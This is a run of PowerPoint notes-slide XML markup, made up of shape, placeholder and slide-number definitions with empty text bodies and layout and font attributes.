          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Shape 416"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Shape 418"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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24" name="Shape 424"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Shape 426"/>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31" name="Shape 431"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Shape 432"/>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433" name="Shape 433"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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9" name="Shape 99"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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39" name="Shape 439"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 441"/>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50" name="Shape 450"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Shape 451"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Shape 452"/>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61" name="Shape 461"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462"/>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463" name="Shape 463"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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74" name="Shape 474"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Shape 475"/>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476" name="Shape 476"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Shape 477"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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86" name="Shape 486"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Shape 487"/>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488" name="Shape 488"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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98" name="Shape 498"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 499"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500"/>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09" name="Shape 509"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>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511" name="Shape 511"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Shape 512"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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17" name="Shape 517"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Shape 518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>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7" name="Shape 107"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Shape 108"/>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09" name="Shape 109"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Shape 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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5" name="Shape 115"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Shape 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
